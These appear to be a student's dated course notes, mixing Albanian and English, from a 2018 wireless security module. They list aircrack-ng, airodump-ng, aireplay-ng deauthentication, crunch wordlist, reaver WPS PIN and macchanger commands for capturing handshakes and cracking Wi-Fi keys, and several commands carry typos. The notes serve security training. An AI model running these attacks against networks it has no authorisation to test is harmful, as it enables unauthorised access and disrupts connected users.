##########################################################################################
23.07.2018, module-5 Day 1
https://www.youtube.com/watch?v=7HTfUUzdmEk

802.11a,b,g,n

ranges for a b g n

ssid: ap name
bssid: MAC address of the wireless access point 

Aircrack-ng toolkit
airmon-ng --na mundeson int me qit ne monitor mode
airdump-ng --me pa krejt AP e te dhenat e tyre i run me ni file
airplay-ng --i disconnect edhe i detyron mu ri connect qe mi nxon handshake
aircrack-ng --me crackirat passwin

airmon-ng
airmon-ng check kill
airmon-ng start wlan0

airodump-ng wlan0mon
airodum-ng --channel 6 --write capFiles --bssid interfce name

aireplay-ng -9 wlan0mon
crunch 5 5 0123456789 > filelist.txt --me gjeneru worldlista

aircrack-ng -b bssid mac -w worldlist.txt CybHack-01.cap

ifconfig | grep flags | cut -d " " -f 1 | tr -d ":"
ifconfig | grep "init\b" | cut -d  " " -f 10
  
=====Arbeni cracking wep
Grep interface ip's: 
ifconfig | grep "inet\b" | cut -d " " -f 10

Grep specific interface ip:
ifconfig eth0 | grep "inet\b" | cut -d " " -f 10
or
ifconfig eth0 | grep "inet\b" | awk '{print $2}'

Grep interface name:
ifconfig | grep flags | cut -d " " -f 1 | tr -d ":"
---------------------------------------------------------
1)
airmon-ng check kill - (to kill processes that are in conflict with aircrack-ng suite)
airmon-ng - (to see which interfaces are available)
airmon-ng start wlan0 - (to start wlan0 in monitoring mode)

2)
airodump-ng wlan0mon - (to see AP's and their prefrences)
airodump-ng --bssid <Wifi Macaddress(BSSID)> --channel <nr> --write <CapturedFiles> wlan0mon
..wait for enough beacons

3) aircrack-ng -b <WifiMacaddress(BSSID)> CapturedFiles-01.cap

Cracked!


5) airmon-ng stop wlan0mon
6) service network-manager restart
##########################################################################################
25.07.2018, module-5 Day 2

beacons --frames qe permbajn network informations

ifconfig eth0
iwconfig

$/proc/sys/net/ipv4# cat icmp_echo_ignore_all
/etc/sysctl.conf
net.ipv4.icmp_echo_ignore_all = 1
# sysctl -p --restart
#cat /proc/sys/net/ipv4/icmp_echo_ignore_all --to confirm

iwlist wlan0 scanning  --active scanning
airdump-ng --pactive scanning


auth mode:
open
wep --limited password length
wpa1, 2, 3

tx rx error --error on packets
dropped --kur ka buffer overflow
carrier --sa her eshte humb sinjali, zakonisht kabell problem
collisios -- ne hub enviroment
csma/cd
csma/ca

full duplex - lan
half duplex - toki woki
simplex -- tv

wireless works - full duplex

airodump-ng wlan0mon --clients connected

macchanger etho -r --rendom mac change
macchanger etho -m xx:xx:xx:xx:xx:xx eth0
initiate de auth packets to deactivate clients than essid will be shown when clients start to connect

-----------------------------------
airmon-ng check kill
airmon-ng
airmon-ng start wan0
ifconfig -- del eminr e bon wlan0mon
airodump-ng wlan0mon
airmon-ng --bssid xx:xxx:xx:xx --channel 11 --write wifisecurity.txt wlan0mon
airodump-ng wlan0mon
aireplay-ng --deauth 1 -c xx:Xxx:xx:xx -a cc:cc:cc::c:;c:;c wlan0mon
aircrack-ng -w /worldlist path.txt capture file.cap
.##########################################################################################
27.07.2018, module-5 Day 3
munges
.##########################################################################################
30.07.2018, module-5 Day 4
munges
.##########################################################################################
01.08.2018, module-5 Day 5
munges
.##########################################################################################
03.08.2018, module-5 Day 6
munges
.##########################################################################################
06.08.2018, module-5 Day 7
pushim
.##########################################################################################
08.08.2018, module-5 Day 8
pushim
.##########################################################################################
10.08.2018, module-5 Day 9
pushim
.##########################################################################################
13.08.2018, module-5 Day 10

-crack an AP
-worldlist me passworda te wifi
head -n 10 ipko.txt | cut -c 1,3,9
.##########################################################################################
15.08.2018, module-5 Day 11

monitoring interfaces
layered security imortant for wireless security
##########################################################################################
17.08.2018, module-5 Day 12

Target 
2.96 iceberg version
##########################################################################################
20.08.2018, module-5 Day 13
munges

wps

wash --ignore-fcs -i "interface"
reaver -i "interface" -b "BSSID" -vv
reaver -i "interface" -b "BSSID" -vv -p "PIN"
##########################################################################################
22.08.2018, module-5 Day 14
pined based attack
reaver